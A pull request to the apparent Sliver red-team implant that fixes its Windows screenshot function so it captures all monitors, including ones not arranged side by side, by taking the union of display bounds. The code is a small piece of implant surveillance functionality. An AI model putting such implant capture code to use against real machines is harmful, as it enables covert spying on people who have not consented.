### PR TITLE
FIX windows screenshot when multiple monitors are used

### DIFF
--- a/implant/sliver/screen/screenshot_windows.go
+++ b/implant/sliver/screen/screenshot_windows.go
@@ -20,6 +20,7 @@ package screen
 
 import (
 	"bytes"
+	"image"
 	"image/png"
 
 	//{{if .Config.Debug}}
@@ -28,7 +29,7 @@ import (
 	screen "github.com/kbinani/screenshot"
 )
 
-//Screenshot - Retrieve the screenshot of the active displays
+// Screenshot - Retrieve the screenshot of the active displays
 func Screenshot() []byte {
 	return WindowsCapture()
 }
@@ -37,15 +38,13 @@ func Screenshot() []byte {
 func WindowsCapture() []byte {
 	nDisplays := screen.NumActiveDisplays()
 
-	var height, width int = 0, 0
+	var all image.Rectangle = image.Rect(0, 0, 0, 0)
+
 	for i := 0; i < nDisplays; i++ {
 		rect := screen.GetDisplayBounds(i)
-		if rect.Dy() > height {
-			height = rect.Dy()
-		}
-		width += rect.Dx()
+		all = rect.Union(all)
 	}
-	img, err := screen.Capture(0, 0, width, height)
+	img, err := screen.Capture(all.Min.X, all.Min.Y, all.Dx(), all.Dy())
 
 	if err != nil {
 		//{{if .Config.Debug}}


### PR DESCRIPTION
… , and they are not exactly side-by-side

The previous windows implementation was working only if monitors were stup to be in "perfect horizontal line"  in the copntrol panel, and failing otherwise. As majority of laptop users setup their laptop screen to be below bigger monitors, impla,ts would miss all "below" monitors.

#### Card

#### Details
